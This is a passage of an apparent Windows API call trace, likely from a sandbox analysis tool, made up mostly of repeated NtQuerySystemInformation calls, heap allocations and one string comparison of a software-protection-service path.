Length=0x38, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0277.333] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.337] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fe1a0, Length=0x40, ResultLength=0x0) [0277.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fe1a0, Length=0x40, ResultLength=0x0) [0277.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.511] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fe1a0, Length=0x40, ResultLength=0x0) [0279.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fde50, Length=0x20, ResultLength=0x0) [0279.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddd0, Length=0x20, ResultLength=0x0) [0279.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdd60, Length=0x20, ResultLength=0x0) [0279.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddd0, Length=0x20, ResultLength=0x0) [0279.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdd60, Length=0x20, ResultLength=0x0) [0279.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fde50, Length=0x20, ResultLength=0x0) [0279.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fe1a0, Length=0x40, ResultLength=0x0) [0279.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fde40, Length=0x20, ResultLength=0x0) [0279.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddc0, Length=0x20, ResultLength=0x0) [0279.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdd50, Length=0x20, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddc0, Length=0x20, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdd50, Length=0x20, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fde40, Length=0x20, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.568] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0279.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.267] GetProcessHeap () returned 0x27fc8db0000 [0280.267] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x230) returned 0x27fc9a08b20 [0280.267] GetProcessHeap () returned 0x27fc8db0000 [0280.267] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f87170 [0280.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdfb0, Length=0x50, ResultLength=0x0) [0280.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdfb0, Length=0x50, ResultLength=0x0) [0280.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdfb0, Length=0x50, ResultLength=0x0) [0280.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdea0, Length=0x50, ResultLength=0x0) [0280.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdea0, Length=0x50, ResultLength=0x0) [0280.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdea0, Length=0x50, ResultLength=0x0) [0280.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdea0, Length=0x50, ResultLength=0x0) [0280.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddd0, Length=0x38, ResultLength=0x0) [0280.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc00, Length=0x28, ResultLength=0x0) [0280.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc00, Length=0x28, ResultLength=0x0) [0280.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc00, Length=0x28, ResultLength=0x0) [0280.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc00, Length=0x28, ResultLength=0x0) [0280.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc70, Length=0x28, ResultLength=0x0) [0280.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddd0, Length=0x38, ResultLength=0x0) [0280.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdcf0, Length=0x28, ResultLength=0x0) [0280.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdcf0, Length=0x28, ResultLength=0x0) [0280.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x20, ResultLength=0x0) [0280.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x20, ResultLength=0x0) [0280.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x20, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x20, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddd0, Length=0x38, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fddd0, Length=0x38, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdc50, Length=0x20, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdbe0, Length=0x20, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdbe0, Length=0x20, ResultLength=0x0) [0280.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0280.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0280.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0280.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x50, ResultLength=0x0) [0280.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x50, ResultLength=0x0) [0280.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x50, ResultLength=0x0) [0280.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd10, Length=0x50, ResultLength=0x0) [0280.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0280.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0280.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0280.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0280.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0280.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0280.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0280.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0280.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0280.296] NtQuerySystemInformation 